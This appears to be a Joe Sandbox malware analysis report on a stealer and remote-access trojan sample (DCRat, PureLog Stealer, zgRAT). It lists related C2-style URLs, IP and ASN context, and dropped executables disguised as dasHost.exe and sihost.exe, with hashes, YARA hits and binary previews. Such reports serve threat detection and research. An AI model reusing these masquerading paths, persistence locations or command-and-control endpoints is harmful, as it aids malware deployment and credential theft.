                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            17:32:34API Interceptor435x Sleep call for process: powershell.exe modified
                                                            17:32:50API Interceptor554729x Sleep call for process: TnsvMjfQwJOjpYJzqEDNh.exe modified
                                                            17:32:51API Interceptor2x Sleep call for process: svchost.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            104.21.38.84Udzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            • 586580cm.renyash.ru/eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php
                                                            0V2JsCrGUB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            • 517300cm.renyash.ru/pipeJavascriptDefaulttrafficWp.php
                                                            HMhdtzxEHf.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            • 495112cm.renyash.ru/vmLineMultiUniversalwp.php
                                                            eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            • 250345cm.renyash.ru/sqltemp.php
                                                            GqjiKlwarV.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            • 101349cm.renyash.ru/VideovmGamedefaultTestuniversalwp.php
                                                            1znAXdPcM5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            • 891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php
                                                            YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            • 250345cm.renyash.ru/sqltemp.php
                                                            U1jaLbTw1f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            • 891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php
                                                            ZZ2sTsJFrt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            • 048038cm.renyash.ru/pipepacketprocessGeneratordownloads.php
                                                            67VB5TS184.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            • 649521cm.renyash.ru/PipeToJavascriptRequestpollcpubasetestprivateTemp.php

                                                            Domains

                                                            No context

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            CLOUDFLARENETUSzmpZMfK1b4.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                            • 172.67.74.152
                                                            https://url.us.m.mimecastprotect.com/s/si15COYvJJSRLD3svhDSGbOPs?domain=ejfv5thbb.cc.rs6.netGet hashmaliciousUnknownBrowse
                                                            • 172.66.0.227
                                                            https://url.us.m.mimecastprotect.com/s/si15COYvJJSRLD3svhDSGbOPs?domain=ejfv5thbb.cc.rs6.netGet hashmaliciousUnknownBrowse
                                                            • 104.18.95.41
                                                            https://docs.zoom.us/doc/NGIyJXAkRDK0sAtAUh4DFw?from=emailGet hashmaliciousUnknownBrowse
                                                            • 1.1.1.1
                                                            https://ezdrivema.com-payowa.top/iGet hashmaliciousUnknownBrowse
                                                            • 104.21.1.179
                                                            https://app.heractivatie-portal.net/Get hashmaliciousUnknownBrowse
                                                            • 104.21.9.2
                                                            https://ville-tonnerre.com/CR_CM/config/information.php?access.x61307366953&&data.x=en_3abae6f9aa37b42f5c9bf622cGet hashmaliciousUnknownBrowse
                                                            • 104.16.225.240
                                                            Udzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            • 104.21.38.84
                                                            SDIO_R773.exeGet hashmaliciousLummaCBrowse
                                                            • 104.21.64.1
                                                            QsBdpe1gK5.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 104.21.80.1

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            C:\Users\user\Desktop\BkJolhdT.logntoskrnl2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              top.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                DC86.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  WinPerfcommon.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                    Udzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      loader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        hz7DzW2Yop.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          7aHY4r6vXR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            0V2JsCrGUB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              FYKrlfQrxb.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                Created / dropped Files

                                                                                C:\Program Files (x86)\Microsoft Office\Office16\21b1a557fd31cc

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:ASCII text, with very long lines (423), with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):423
                                                                                Entropy (8bit):5.859209680800249
                                                                                Encrypted:false
                                                                                SSDEEP:12:g8HYuTjZ0sPlgTSxiEpvN0TGlp3ry0o5QO8wfQIbTfDiTfin:N4ojZLtgT8i+vOCHb948wLXkfin
                                                                                MD5:12F8A41946E984A15753793B4DA7AD44
                                                                                SHA1:DE659491F6E4F6D4911C1AB70388F0179B17C950
                                                                                SHA-256:6518C628F539387D50F1538B00ED75B7781D53EBB28C8E008C0CACA61735775C
                                                                                SHA-512:161EF67D47A782F2456FEE951A36FD7CDC90E27225E2A3BF9FDE668EB6353754A177A62620F75B4E03BCD7A449C3A9656E6E319DCD561D3C49B7FA7BC1EBC89C
                                                                                Malicious:false
                                                                                Preview:ytNBu37JGuX9YbuxjE8VUapkvVLWZccQbN1zkmV1jKDDSmkhRVzXTtFXDmPYrkuoRGhKk4N6tHvJWmSIvnFDmF7sIdv7X6J8aZvLFZ7WH2oM86BbTGnDfqBMJzCGJPiw7wt70HDVqs6uautMcUoQTFdtYiBQX0N1T2PLMDkLDRXxuRvZF0oylSc1T9jRGw8zeEaifi9YtdNCsp9HxlLhMYQBZX1MeTFQSiTp0M3g0PFIEaJoAceelbmFxYJIqw3aY6tJWTQksoq7SI69NNMCykp15N1bDvzEVpuIrASrL4w7vpwpbK5dj1lxQ2OIbyg6ylmnYySN5f03ysFQbMA30WeeE61zvJPXXzIJCJQn2siEAs9iw8qOynGcGIjb7dbvQdf8j6NR6WBIxadV7SCxcAjutqD4kyqYQxygMA9

                                                                                C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exe

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):2072064
                                                                                Entropy (8bit):7.58658487031714
                                                                                Encrypted:false
                                                                                SSDEEP:24576:HYr3EZ/kdF9GuY43p1KmQbTGVQTB/QaYz0S2mohG8MovgzgDVz+hpse0TGMii5yd:HYazmKFWQTcZ2moQ8NDz+L2Hii8
                                                                                MD5:7A6B9E23ECCB90B36EB6A4FE87427D41
                                                                                SHA1:61B75CD9AC8551EF47C5D7C9F09BB42CD0E5D8D5
                                                                                SHA-256:BDE2679020ADE3F5EC36455BF8BB57F4EF24724FDDF832D41E5121C249C75C5D
                                                                                SHA-512:73637592E95C291A9FF7991C4F2EACA70455B2CF5D7FBDC1974F93D3191153D2BE7EB5B970C340F1D9A04A28E946C63E6AC9D070BA6991C59FA2843D5E45A83B
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exe, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 83%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....vzg................................. ........@.. ........................ ...........@....................................K....... ............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H...............................O........................................0..........(.... ........8........E....9.......)...8...84...(.... ....~....{....:....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0.......... ........8........E................j.......>.......8....~....9.... ....~....{....:....& ....8.......... ....8........~....(T...~....(X... ....<@... ....8u...~....(L... .... .... ....s....~....(P....... ....8?...r...ps....z*8.... ....~....{....:

                                                                                C:\Program Files\WindowsPowerShell\Modules\66fc9ff0ee96c2

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:ASCII text, with very long lines (720), with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):720
                                                                                Entropy (8bit):5.8704731776860655
                                                                                Encrypted:false
                                                                                SSDEEP:12:4bwGMrHRSrys6mYzkHI4V5z4yH1bG56DtY8MBt/fyunJO1fs3M9qRRAjmHI:4bzQaV7iWIu5zdG56DLMzqs89qj4
                                                                                MD5:AF656608DE71DF8920F763FD8E055840
                                                                                SHA1:462AE9AA0848277F836AAAA9A0BA611C93E961B4
                                                                                SHA-256:F19397595A6CD633435039C4F89B59E99E3D4209B91AC8F28A93DAC4137154D7
                                                                                SHA-512:D0B56E5FDEB71B69909252F1FD0513977323170848EEA9663F7BDD7FF9ABBBEF519590CF5567B9C4BE61B6327D7B27460E58E21D0319EE74BDD8266ACC755BAD
                                                                                Malicious:false
                                                                                Preview:6tvGX3a777BgamYEVygWUnZxMLrJ9DGYuere6mEoj8uBDkE53BvpcdYST74LLR830nv543Hst1xW2YulGwP7Rb5QGYL9s2dR91LazIBA3D5lqCa5NSEYBBlYrezfsIA0YfWBMUw8uPDOfUkE8PwayEQ8PwsUTgSvCFMKpZs2gGnw7X3W4vgcWkCTPYvalbpO6SLaHZYjg33radB23WZh9zYcC35RnSREbZzoLcOfW75cqV3vW3gPCHPH3tXOeH5OmzPBoWraH4LB36wrAJ4tvCBTJsucF9APCr00F1HAMFHH6ON76pOVMLckx516lPVI359MG5mIB4hp44X5exfZupC0OPCJ9LY7u8NAPA0ADGTSowp3i6byt6XO3I803dI0gj56qXqd6eWoWuLbkJkDtjNyl9HGCAHk7cvE1tNLQ71Pjs1I6gQu2FH6VHUqQjb6Wwq48Hk15Zwvr8O2H8JguXr2VystYh4rg52xC7Kz5ZycSVOX3ciRZ5M9EyjJY0cYeFPwGa0KyUkVjPj9kV068nRlt3tNYAbE6a7NFcQcmXdFU1azPjjCAgZ1ynDMqmwy2fYIRV3HEXTkJLQ1d48zaYEaAFZcYDv9lpMzcRh3pb7mMzrmXLtwo6Xea8IL6btAmU8e9bZMWEJ8acNLYwENU9VoRsYeIW6Ns7A20Nn5vhZjxZD8v6xKWfqm9TNQC5DAI6PdbVVKIJbwjv11

                                                                                C:\Program Files\WindowsPowerShell\Modules\sihost.exe

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):2072064
                                                                                Entropy (8bit):7.58658487031714
                                                                                Encrypted:false
                                                                                SSDEEP:24576:HYr3EZ/kdF9GuY43p1KmQbTGVQTB/QaYz0S2mohG8MovgzgDVz+hpse0TGMii5yd:HYazmKFWQTcZ2moQ8NDz+L2Hii8
                                                                                MD5:7A6B9E23ECCB90B36EB6A4FE87427D41
                                                                                SHA1:61B75CD9AC8551EF47C5D7C9F09BB42CD0E5D8D5
                                                                                SHA-256:BDE2679020ADE3F5EC36455BF8BB57F4EF24724FDDF832D41E5121C249C75C5D
                                                                                SHA-512:73637592E95C291A9FF7991C4F2EACA70455B2CF5D7FBDC1974F93D3191153D2BE7EB5B970C340F1D9A04A28E946C63E6AC9D070BA6991C59FA2843D5E45A83B
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\WindowsPowerShell\Modules\sihost.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\WindowsPowerShell\Modules\sihost.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\WindowsPowerShell\Modules\sihost.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\WindowsPowerShell\Modules\sihost.exe, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 83%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....vzg................................. ........@.. ........................ ...........@....................................K....... ............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H...............................O........................................0..........(.... ........8........E....9.......)...8...84...(.... ....~....{....:....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0.......... ........8........E................j.......>.......8....~....9.... ....~....{....:....& ....8.......... ....8........~....(T...~....(X... ....<@... ....8u...~....(L... .... .... ....s....~....(P....... ....8?...r...ps....z*8.... ....~....{....:

                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                Download File
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0xad2bc21b, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                Category:dropped
                                                                                Size (bytes):1310720
                                                                                Entropy (8bit):0.422133273947136
                                                                                Encrypted:false
                                                                                SSDEEP:1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
                                                                                MD5:9693234ECD4263F63CC324C4BFDE2153
                                                                                SHA1:007D206189607386A36CD9A73B08D088A790AAA5
                                                                                SHA-256:9D68600586FB1E11D8A229FF9E5B110830B427F43505E81E51B4AAEBC8BBD981
                                                                                SHA-512:CFD4FCD180D40D78EFC7F33795A05696795114FF41BFEDF85C1042B7DB05AC705153BD9623B2DCC9594A95A8059A71F64F76CE0EB3377E6F60828ED3253FE282
                                                                                Malicious:false
                                                                                Preview:.+..... .......A.......X\...;...{......................0.!..........{A.5 ...}C.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{......................................5 ...}..................Dyh.5 ...}c..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):2072064
                                                                                Entropy (8bit):7.58658487031714
                                                                                Encrypted:false
                                                                                SSDEEP:24576:HYr3EZ/kdF9GuY43p1KmQbTGVQTB/QaYz0S2mohG8MovgzgDVz+hpse0TGMii5yd:HYazmKFWQTcZ2moQ8NDz+L2Hii8
                                                                                MD5:7A6B9E23ECCB90B36EB6A4FE87427D41
                                                                                SHA1:61B75CD9AC8551EF47C5D7C9F09BB42CD0E5D8D5
                                                                                SHA-256:BDE2679020ADE3F5EC36455BF8BB57F4EF24724FDDF832D41E5121C249C75C5D
                                                                                SHA-512:73637592E95C291A9FF7991C4F2EACA70455B2CF5D7FBDC1974F93D3191153D2BE7EB5B970C340F1D9A04A28E946C63E6AC9D070BA6991C59FA2843D5E45A83B
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 83%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....vzg................................. ........@.. ........................ ...........@....................................K....... ............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H...............................O........................................0..........(.... ........8........E....9.......)...8...84...(.... ....~....{....:....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0.......... ........8........E................j.......>.......8....~....9.... ....~....{....:....& ....8.......... ....8........~....(T...~....(X... ....<@... ....8u...~....(L... .... .... ....s....~....(P....... ....8?...r...ps....z*8.... ....~....{....:

                                                                                C:\Recovery\ba5d7d16636746

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:ASCII text, with very long lines (521), with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):521
                                                                                Entropy (8bit):5.877880996868902
                                                                                Encrypted:false
                                                                                SSDEEP:12:z1wTwrMUfsElOFSZP36sXyTzWYI0Yy0bPDXPSaaJAKrYRTv:ZmpZyd6RYfbP+aaJ4N
                                                                                MD5:6AB41136D80B19AA985595CD06ECB4AE
                                                                                SHA1:175C53E0ADCDA948244F4DD1C76D56D82D3941F5
                                                                                SHA-256:56B224FCCB0AE6F9393242F299204EF5F97B2A3506B80E56488A69EBA38020F4
                                                                                SHA-512:E084A40A3F803BB01DC7447032E046A5593CC5F887B6631B1861C75C86D67B99BC377833101D5EA9DC26987F3DFE20D3FEA8F29E7C03C3A3838B8E51B81849E2
                                                                                Malicious:false
                                                                                Preview:WyNeLLrYx35K8jK3fIPaFrBdcBXcqCAUy9QgMA6WtOr4s1qyIj8YS4apxuBKxOsu3kV8TnrfM2r0AGukVjTHElB3jlsb8wjeg6AHfref2dMZNjorAbzN4kqRicZs4PgaTMUDFmEnEyOkZmq96Bbh7Wj5QtjDSwkn6wGAPllXWLIGWF26vZv3x9c7nYxWDAVRNlonfpuUaEKvNcjK0mR2Brz6TJX1yOUV002ubOaGoadtzrtKymfascQgvrUWR3gLuy5WkytlLLNkNGHlZNCLt3nXjW9t4Eyv4S9AwXkA33OhOqSojs6E1Vb0LhwNzArHWcq5HHzCnBSzpFI3DUJMHu4i0JyOkWK3MHKwAXhc24azDmKFY3Kf0e9liHF8SlbR1Zni4W2pwrTNUFfO8tzrLpCrHjO3SiJRcJ8n8mKCAesJKvRdl0AjvuFLW5aVI9XOhCuKG1PWixqr73gVRvRbikfsDwQCLy4BGdmIBGWtlnB8EYNdZEEWr6p6gCHTkMLt2okdQXULZ

                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ComrefNetsvc.exe.log

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:modified
                                                                                Size (bytes):1698
                                                                                Entropy (8bit):5.367720686892084
                                                                                Encrypted:false
                                                                                SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs0HK1HmHKlT4x:iqbYqGSI6oPtzHeqKkt1wmj0q1GqZ4x
                                                                                MD5:1CC465BAC3EF7B2D68EBEDF067EF45EA
                                                                                SHA1:2C2DEC3CF0CBCCF3B3238ADEB28524C909BA5273
                                                                                SHA-256:F4604427137BD1C68C5FC6CA6A23DA69977F78ACE88B0C1D3BEBCFA59D64B6F6
                                                                                SHA-512:EE3CB2F0E3696758A3D7E15D9F2B9436EC7307509259AEF502892AE665F59BC50EA75C47200D73BBA4C90A8C07B5736843CDC75CAA4751531D5541AF934CFE51
                                                                                Malicious:false
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT

                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):19253
                                                                                Entropy (8bit):5.005753878328145
                                                                                Encrypted:false
                                                                                SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
                                                                                MD5:81D32E8AE893770C4DEA5135D1D8E78D
                                                                                SHA1:CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
                                                                                SHA-256:6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
                                                                                SHA-512:FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
                                                                                Malicious:false
                                                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:modified
                                                                                Size (bytes):64
                                                                                Entropy (8bit):1.1940658735648508
                                                                                Encrypted:false
                                                                                SSDEEP:3:NlllulJnp/p:NllU
                                                                                MD5:BC6DB77EB243BF62DC31267706650173
                                                                                SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                Malicious:false
                                                                                Preview:@...e.................................X..............@..........

                                                                                C:\Users\user\AppData\Local\Temp\0FEHPsJ7Vd

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\0YKhB50rIt

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\0pMkvRpjPR

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\0v9aXmpoUM

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
